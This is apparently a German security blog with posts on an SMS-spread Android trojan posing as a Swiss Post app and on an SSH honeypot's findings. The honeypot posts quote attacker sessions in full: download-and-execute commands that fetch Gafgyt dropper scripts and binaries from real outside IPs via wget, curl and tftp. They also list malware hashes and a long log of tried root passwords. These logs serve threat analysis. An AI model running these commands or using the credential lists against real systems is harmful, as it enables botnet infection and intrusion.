Android Trojaner als Post-App via SMS

Aktuell kursiert im Schweizer Mobilfunknetz ein Android-Trojaner getarnt als verpasstes Post-Paket:

image

Hinter dem Short-Link steht der Link zu einer APK-Datei, welche sich als Post-App ausgibt.

image

Am Ende ist es jedoch ein einfacher Trojaner:

image

Dies wird auch schnell klar, wenn man sich die App mal genauer anschaut. So verschafft sich das Ding ganz schön viele Berechtigungen, die jeden Smartphone-User hellhörig werden lassen sollten:

image

Am Besten ist es, die SMS zu löschen und sofort zu vergessen!

Honeypot Project – Auswertung

Mein Honypot ist nun knappe 10 Tage gelaufen und es ist Zeit für eine erste Auswertung.

Insgesamt sind fast 200 Uniq-IPs im Honeypot aufgeschlagen und haben zusammen ca. 28’500 Loginversuche ausgeführt – das sind rund 2 Passwortversuche pro Minute…

Davon waren aber gerade mal 434 erfolgreich (ich habe die bekanntesten Passwörter weggefiltert und die bereits erfolgreichen jeweils dem Exclude immer wieder ergänzt) und nur 131 haben tatsächlich ein Kommando auf dem System abgesetzt. Die am Meisten genutzten Kommandos sind erwartungsgemäss:

cmd

Dabei scheint es die meisten zu interessieren, wo sie sind und wie sie mit der Aussenwelt verbunden sind und erst dann lädt man sich mit wget neue Daten nach, macht ja auch nur so rum Sinn 🙂

Wenn man sich nun mal die benutzten Kombinationen anschaut, so fällt auf, dass die Standards wie „root/root“ oder „root/password“ zwar noch in den Top 15 dabei sind, jedoch nicht mehr ganz vorne dabei. Viel beliebter scheint „root/*“ zu sein:

passwoerter

Wenn man die User gesondert anschaut, so zeigt sich das übliche Bild:

user

Bei den Passwörtern hingegen kam für mich wieder die nächste Überraschung:

user_pw

Hier sind wieder Passwörter wie „*“ oder „**“ vorne dabei. Sehr spannend fand ich das Passwort „<b,bujY“. Dies scheint mir irgendwie viel zu spezifisch, als dass dies bei einer Brute-Force passen könnte… Vielleicht das Standardpasswort einer verbreiteten Software?

Freundliches Hallo aus Russland

Heute gab es eine spannende Begegnung mit einem Angreifer aus Russland:

Verbindung: 185.103.109.70
Version: SSH-2.0-libssh2_1.4.2
Login: root / admin

Kaum war die Verbindung aufgebaut, ging es auch schon los:

cd /tmp;
wget hXXp://185.22.173.65/bins.sh
chmod +x bins.sh
chmod 777 *
sh bins.sh"

Die Datei „bins.sh“ dient als einfacher Dropper:

MD5: 18dd76f99d222bf2cb193a5cdb872e3d
SHA1: 4fdb0beaaa8db435d771ba9deb7c01afc3b5a2c3
SHA256: 07fe22f4b754d28efd62157f7ee6aa4c1f63dd21dac33c2b600e42cbabff6daf
Magic literal: ASCII text

Sobald die Datei gestartet wird, werden weitere Ressourcen vom selben Server heruntergeladen:

wget hXXp://185.22.173.65/snarmv6; chmod +x snarmv6; chmod 777 *; ./snarmv6
wget hXXp://185.22.173.65/snmips; chmod +x snmips; chmod 777 *; ./snmips
wget hXXp://185.22.173.65/snmipsel; chmod +x snmipsel; chmod 777 *; ./snmipsel
wget hXXp://185.22.173.65/snpowerpc; chmod +x snpowerpc; chmod 777 *; ./snpowerpc
wget hXXp://185.22.173.65/snsh4; chmod +x snsh4; chmod 777 *; ./snsh4
wget hXXp://185.22.173.65/snmyx86; chmod +x snmyx86; chmod 777 *; ./snmyx86
wget hXXp://185.22.173.65/vmp; chmod +x vmp; chmod 777 *; ./vmp

Hinter den einzelnen Dateien steht der Trojaner Gafgyt in verschiedene Versionen, welcher dem Angreifer auch als Backdoor dient:

snarmv6: 657d00724e41e5c40331f5eb925e56acf7c9dd3188b2c0a268623ed6e580a556
snmips: c8aa69c0d6e3399411cfae7c65b70bf8b1b0c099c80613a302e53b2d04d2be16
snmipsel: 0388e01fec61499e6d5cc7b3b2d88353886ae619d83c0d8ae633b1eb8684bf9a
snpowerpc: 5e0f5df89d6589f4f67ab5b051da388f48dcaa66d21a14562f23157c0f9b54f1
snsh4: 9922bada2c9dee8529da8482b66f35b7df415c5cc291e675c688fdfa0db131cc
snmyx86: 40f47ddda5ca8ceacd1ca9f4dd4e65fb5f6749d33c083ed6bf83aa7b861821f1
vmp: 17d5252c3c9d1d37340bf91a2e0eedcf24890858100b270f5386616669edf11e

Circa eine Stunde später, war der liebe Kollege aber schon wieder auf meinem System jedoch mit neuen Befehlen:

cd /tmp
wget hXXp://107.172.41.130/bins.sh || curl -O hXXp://107.172.41.130/bins.sh
chmod 777 bins.sh
sh bins.sh
busybox tftp 107.172.41.130 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
busybox tftp -r tftp2.sh -g 107.172.41.130
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf bins.sh tftp1.sh tftp2.sh

Diesmal hat sich auch der Dropper etwas verändert, scheint wohl Version 2.0 zu sein.

cd /tmp; wget hXXp://107.172.41.130/GHfjfgvj; chmod 777 GHfjfgvj; ./GHfjfgvj; rm -rf GHfjfgvj
cd /tmp; wget hXXp://107.172.41.130/JIPJIPJj; chmod 777 JIPJIPJj; ./JIPJIPJj; rm -rf JIPJIPJj
cd /tmp; wget hXXp://107.172.41.130/jhUOH; chmod 777 jhUOH; ./jhUOH; rm -rf jhUOH
cd /tmp; wget hXXp://107.172.41.130/RYrydry; chmod 777 RYrydry; ./RYrydry; rm -rf RYrydry
cd /tmp; wget hXXp://107.172.41.130/UYyuyioy; chmod 777 UYyuyioy; ./UYyuyioy; rm -rf UYyuyioy
cd /tmp; wget hXXp://107.172.41.130/XDzdfxzf; chmod 777 XDzdfxzf; ./XDzdfxzf; rm -rf XDzdfxzf
cd /tmp; wget hXXp://107.172.41.130/JIPJuipjh; chmod 777 JIPJuipjh; ./JIPJuipjh; rm -rf JIPJuipjh
cd /tmp; wget hXXp://107.172.41.130/DFhxdhdf; chmod 777 DFhxdhdf; ./DFhxdhdf; rm -rf DFhxdhdf
cd /tmp; wget hXXp://107.172.41.130/FDFDHFC; chmod 777 FDFDHFC; ./FDFDHFC; rm -rf FDFDHFC
cd /tmp; wget hXXp://107.172.41.130/FTUdftui; chmod 777 FTUdftui; ./FTUdftui; rm -rf FTUdftui

Hinter den einzelnen Files steht am Schluss aber immer noch der selbe Trojaner, somit nichts neues an dieser Front. Aber mal schauen, ob wir uns bald wieder sehen, vielleicht mit Version 3.0…

Die Essenz von Brute-Force-Angriffen

Heute bin ich wieder über ein lustiges Treffen zwischen meinem Honeypot und einem Kollegen aus Kanada gestossen. Dieser hat sich ziemlich lange auf meinem Server ausgetobt und insgesamt 109 Benutzername/Passwort-Kombinationen ausprobiert – und das obwohl er bereits beim ersten Versuch erfolgreich war 😀

02:28:55 - Neue Verbindung: 45.62.239.168 
02:28:56 - Login-Versuch: [root/nu-e-bun] erfolgreich
02:29:03 - Login-Versuch: [root/g2wvs3mJe6H6] erfolgreich
02:29:11 - Login-Versuch: [root/10D2mixmswCN] erfolgreich
02:29:18 - Login-Versuch: [root/can1dace] erfolgreich
02:29:26 - Login-Versuch: [root/G00dS5hs3rV3rR00t] erfolgreich
02:29:34 - Login-Versuch: [root/GftRudW!!] erfolgreich
02:29:40 - Login-Versuch: [root/ggdaseuaimhrke] erfolgreich
02:29:48 - Login-Versuch: [root/ROOT500] erfolgreich
02:29:56 - Login-Versuch: [root/apache2svn] erfolgreich
02:30:04 - Login-Versuch: [root/apache!svn] erfolgreich
02:30:12 - Login-Versuch: [root/apache@svn] erfolgreich
02:30:19 - Login-Versuch: [root/<b,bujY] erfolgreich
02:30:26 - Login-Versuch: [root/centos5svm] erfolgreich
02:30:33 - Login-Versuch: [root/centos6svm] erfolgreich
02:30:39 - Login-Versuch: [root/centos7svm] erfolgreich
02:30:46 - Login-Versuch: [root/Fi5bebeinguve4] erfolgreich
02:30:53 - Login-Versuch: [root/cms500] erfolgreich
02:31:04 - Login-Versuch: [root/dontxekme] erfolgreich
02:31:10 - Login-Versuch: [root/Ebs!@#456] erfolgreich
02:31:17 - Login-Versuch: [root/eHQD91VXAvn6VY] erfolgreich
02:31:25 - Login-Versuch: [root/fedora7svm] erfolgreich
02:31:32 - Login-Versuch: [root/firedrop2] erfolgreich
02:31:39 - Login-Versuch: [root/fivranne] erfolgreich
02:31:47 - Login-Versuch: [root/mawhyts5] erfolgreich
02:31:54 - Login-Versuch: [root/franksinatra] erfolgreich
02:32:01 - Login-Versuch: [root/smart488] erfolgreich
02:32:09 - Login-Versuch: [root/dico9984245] erfolgreich
02:32:17 - Login-Versuch: [root/@rtz0ne0829] erfolgreich
02:32:24 - Login-Versuch: [root/;yogfnvoxu] erfolgreich
02:32:32 - Login-Versuch: [root/b8ec3103f05c47b34759672a3fa14bf4] erfolgreich
02:32:39 - Login-Versuch: [root/floiubestepeinab8ec3103f05c47b34759672a3fa14bf4] erfolgreich
02:32:47 - Login-Versuch: [admln/kopet123] fehlgeschlagen
02:32:50 - Login-Versuch: [root/temprootpass123!@] erfolgreich
02:32:57 - Login-Versuch: [root/69ixaya] erfolgreich
02:33:05 - Login-Versuch: [root/heremon@./] erfolgreich
02:33:12 - Login-Versuch: [root/Heremon@./] erfolgreich
02:33:20 - Login-Versuch: [root/heremon] erfolgreich
02:33:28 - Login-Versuch: [root/zd9367u2] erfolgreich
02:33:35 - Login-Versuch: [root/pw123123] erfolgreich
02:33:42 - Login-Versuch: [artem/KK@rTem12K] fehlgeschlagen
02:33:44 - Login-Versuch: [dbseller/2011#dbimplanta] fehlgeschlagen
02:33:47 - Login-Versuch: [root/2011#dbimplanta] erfolgreich
02:33:54 - Login-Versuch: [phper/1qaz23eds] fehlgeschlagen
02:33:57 - Login-Versuch: [phper/php123] fehlgeschlagen
02:33:59 - Login-Versuch: [damnpoet/mandrak3] fehlgeschlagen
02:34:01 - Login-Versuch: [wordpress/wordpress] fehlgeschlagen
02:34:03 - Login-Versuch: [jenkins/jenkins] fehlgeschlagen
02:34:06 - Login-Versuch: [minecraft/minecraft] fehlgeschlagen
02:34:08 - Login-Versuch: [wuryanto/wuryanto123] fehlgeschlagen
02:34:11 - Login-Versuch: [damriftp/damri123] fehlgeschlagen
02:34:13 - Login-Versuch: [userftp/userftp123] fehlgeschlagen
02:34:15 - Login-Versuch: [damri/123] fehlgeschlagen
02:34:18 - Login-Versuch: [veeambackup/wb68eCPEVT] fehlgeschlagen
02:34:20 - Login-Versuch: [kenny/8701900] fehlgeschlagen
02:34:22 - Login-Versuch: [www/Gw@12345] fehlgeschlagen
02:34:25 - Login-Versuch: [fedora/fedora] fehlgeschlagen
02:34:27 - Login-Versuch: [ubuntu/ubuntu] fehlgeschlagen
02:34:29 - Login-Versuch: [wwwuser/wwwuser] fehlgeschlagen
02:34:31 - Login-Versuch: [debian/debian] fehlgeschlagen
02:34:34 - Login-Versuch: [user5/user5] fehlgeschlagen
02:34:36 - Login-Versuch: [foobar/foobar] fehlgeschlagen
02:34:39 - Login-Versuch: [mexal/mexal] fehlgeschlagen
02:34:41 - Login-Versuch: [gene/gene] fehlgeschlagen
02:34:43 - Login-Versuch: [kang/xiaochen445362] fehlgeschlagen
02:34:45 - Login-Versuch: [nfsnobod/ppkpiu1234] fehlgeschlagen
02:34:47 - Login-Versuch: [openvpn/openvpn] fehlgeschlagen
02:34:49 - Login-Versuch: [shift/!nera@6794] fehlgeschlagen
02:34:51 - Login-Versuch: [ttf/skilodudecta] fehlgeschlagen
02:34:53 - Login-Versuch: [ssh/darunee123] fehlgeschlagen
02:34:56 - Login-Versuch: [greg/greg] fehlgeschlagen
02:34:58 - Login-Versuch: [vpsadmin/SpAd!e-8] fehlgeschlagen
02:35:00 - Login-Versuch: [sshd/dabestmouse] fehlgeschlagen
02:35:06 - Login-Versuch: [tose/toso123hack] fehlgeschlagen
02:35:09 - Login-Versuch: [vivek/vivek] fehlgeschlagen
02:35:12 - Login-Versuch: [zabbix/lunaealba] fehlgeschlagen
02:35:15 - Login-Versuch: [paul/l!sababeln888wx*] fehlgeschlagen
02:35:17 - Login-Versuch: [sercon/sercon] fehlgeschlagen
02:35:20 - Login-Versuch: [patriciar/patriciar] fehlgeschlagen
02:35:22 - Login-Versuch: [anders/anders] fehlgeschlagen
02:35:25 - Login-Versuch: [felipe/felipe] fehlgeschlagen
02:35:28 - Login-Versuch: [coupon/coupon] fehlgeschlagen
02:35:30 - Login-Versuch: [kylix/alexxutzu1$@121] fehlgeschlagen
02:35:33 - Login-Versuch: [etherpad/etherpad] fehlgeschlagen
02:35:35 - Login-Versuch: [links/links] fehlgeschlagen
02:35:38 - Login-Versuch: [tamas/tamas] fehlgeschlagen
02:35:41 - Login-Versuch: [pgsql/pgsql] fehlgeschlagen
02:35:43 - Login-Versuch: [techsupport/techsupport] fehlgeschlagen
02:35:45 - Login-Versuch: [kb/kb] fehlgeschlagen
02:35:49 - Login-Versuch: [ming/ming] fehlgeschlagen
02:35:51 - Login-Versuch: [saneke/sMb2Z9yVPFTJ.] fehlgeschlagen
02:35:54 - Login-Versuch: [karol/karol] fehlgeschlagen
02:35:57 - Login-Versuch: [nfsnobod/dance4life] fehlgeschlagen
02:35:59 - Login-Versuch: [uzzica/uzzyca123aa] fehlgeschlagen
02:36:03 - Login-Versuch: [brutus/test123aa] fehlgeschlagen
02:36:05 - Login-Versuch: [MaxService/admax5543] fehlgeschlagen
02:36:07 - Login-Versuch: [Bali/bali1234`] fehlgeschlagen
02:36:09 - Login-Versuch: [framirez/GanimedeS1] fehlgeschlagen
02:36:11 - Login-Versuch: [root/GanimedeS1] erfolgreich
02:36:19 - Login-Versuch: [vcollaguazo/123vc5823.clid] fehlgeschlagen
02:36:22 - Login-Versuch: [pruebas/pruebas] fehlgeschlagen
02:36:25 - Login-Versuch: [ftp_id/ftp_pass] fehlgeschlagen
02:36:28 - Login-Versuch: [git/cardemis1] fehlgeschlagen
02:36:31 - Login-Versuch: [x/&b4;c2!;k(Ly3-);s(B-] fehlgeschlagen
02:36:33 - Login-Versuch: [kopet/qweasdzxc] fehlgeschlagen
02:36:36 - Login-Versuch: [yangjunpian/AKG450@ikki.me] fehlgeschlagen
02:36:38 - Login-Versuch: [root/savadaumuielatoti] erfolgreich
02:36:46 - Login-Versuch: [bin/tzehu1.,123] fehlgeschlagen
02:36:48 - Login-Versuch: [root/ime@server01!] erfolgreich

Schön blöd, wenn man bei einer Brute-Force-Attacke nicht merkt, dass man Erfolg hatte und idealerweise den Angriff terminieren könnte und noch weitere 10 Minuten weiterprobiert…

Honeypot Project – Wie exponiert sind öffentliche Server wirklich?

Ein Vorsatz, welchen ich mir eigentlich schon länger vorgenommen hatte und nun doch noch endlich mal umgesetzt hatte, ist ein eigener Honeypot. Ziel ist es, herauszufinden, wie exponiert ein öffentlicher Server wirklich ist und dazu habe ich konkret ein SSH Honeypot aufgesetzt und mit einer mehr oder weniger komplexen Konfiguration ausgestattet. Der Honeypot ist am Ende nur low-interactive, doch zum Erfassen von grundlegenden Scans, Passwortversuchen und den ersten Gehversuchen auf einem möglicherweise erfolgreich kompromittiertem System reicht es allemal aus.

Zum Setup ist zu sagen, dass die Maschine sowie die IP bisher nicht genutzt wurden und erst kurz vor dem Honeypot selbst mit online gekommen sind. Die Maschine ist also ziemlich neu im Internet. Mit diesem Wissen im Hinterkopf hat es mich umso mehr erstaunt, dass es knapp 25 Minuten gedauert hat, bis der erste Loginversuch aus Vietnam eingetroffen ist:

Quelle: 113.175.130.234
Version: SSH-2.0-JSCH-0.1.51
Login-Methode: none, keyboard-interactive

Das es ein automatisierter Versuch ist, zeigte sich in den wenigen User/Passwort-Kombinationen, die der Angreifer versuchte:

1. Versuch: „support“ | „support“
2. Versuch: „support“ | „“
3. Versuch: „support“ | „support“

Nach insgesamt 5 Sekunden war der Angreifer auch bereits schon weiter gezogen, weil keiner der Versuche erfolgreich waren – ein weitere Indikator für ein automatischer Probe.

Viel interessanter wird es nun, sobald der erste nicht-automatisierte Angriff eintrifft. Meine Vermutung wäre, dass diese Ankommen, sobald die IP das erste Mal bei z.B. Shodan.io erfasst und gelistet wird… Seien wir gespannt. 🙂

Wer die Angriffe ein bisschen verfolgen möchte, der kann das hier machen.

« Older Entries